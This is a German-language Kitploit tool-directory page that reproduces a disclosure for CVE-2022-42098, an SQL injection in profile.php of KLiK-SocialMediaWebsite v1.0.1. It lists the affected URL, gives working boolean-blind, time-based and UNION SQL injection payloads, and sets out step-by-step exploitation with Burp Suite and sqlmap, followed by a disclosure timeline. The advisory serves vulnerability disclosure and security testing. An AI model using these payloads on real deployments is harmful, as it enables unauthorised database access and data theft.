Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-42098 — KLiK-SocialMediaWebsite v1.0.1 weist SQL-Injection-Schwachstellen in profile.php auf. | Kitploit
Tools/GitHubGitHub/bypazs/cve-2022-42098
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubbypazs/cve-2022-42098

CVE-2022-42098

KLiK-SocialMediaWebsite v1.0.1 weist SQL-Injection-Schwachstellen in profile.php auf.

Repository anzeigen
1vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

KLiK-SocialMediaWebsite Version v1.0.1

Schwachstellen-Erklärung:

KLiK-SocialMediaWebsite v1.0.1 weist SQL-Injection-Schwachstellen in profile.php beim Parameter id auf.

Angriffsvektoren:

KLiK-SocialMediaWebsite v1.0.1: Sobald ein Benutzer erstellt wurde, können über die KLiK-Benutzerseite Personen auf KLiK gefunden werden. Der Parameter "id" der profile.php kann missbraucht werden, um beliebige SQL-Abfragen einzuschleusen.

Betroffen:

  • http://ip_address/KLiK/profile.php?id=user_id
  • GET /KLiK/login.php

Payload :

root@kitploit:~
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=27 AND 3227=3227

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=27 AND (SELECT 3046 FROM (SELECT(SLEEP(5)))barN)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 11 columns
    Payload: id=-2373 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71787a7171,0x6d67676474624545784f564265735871415865575a4f72697053686d724768624969514c70754459,0x717a707071),NULL,NULL,NULL,NULL,NULL,NULL#

Getestet mit:

  1. KLiK SocialMediaWebsite Version v1.0.1 (https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1)

  2. Firefox Version 105

  3. sqlmap Version 1.6.7 stable

Angriffsschritte:

  1. Mit Benutzername und Passwort anmelden.
  2. Auf das Symbol einer Person in der oberen rechten Ecke klicken.
  3. Anfrage mit Burp Suite abfangen.
  4. Eine Person auf der KLiK-Benutzerseite auswählen, indem Sie auf ihren Namen klicken.
  5. Zurück in Burp Suite bei /profile.php mit der rechten Maustaste klicken und "Copy to file" auswählen.
  6. Die Anfragedatei an Kali Linux senden und sqlmap damit verwenden.
  7. SQL-Injection-Schwachstelle wurde über die id entdeckt.

Entdecker:

:shipit: Grim The Ripper Team von SOSECURE Thailand

Medium:

Offenlegungs-Timeline:

  • 2022–09–28: Schwachstelle entdeckt.
  • 2022–09–28: Schwachstelle an die MITRE Corporation gemeldet.
  • 2022–10–15: CVE wurde reserviert.
  • 2022–10–31: Öffentliche Offenlegung der Schwachstelle.

Referenzen:

  1. https://github.com/msaad1999/KLiK-SocialMediaWebsite/releases/tag/v1.0.1

  2. https://github.com/msaad1999/KLiK-SocialMediaWebsite

Tool herunterladen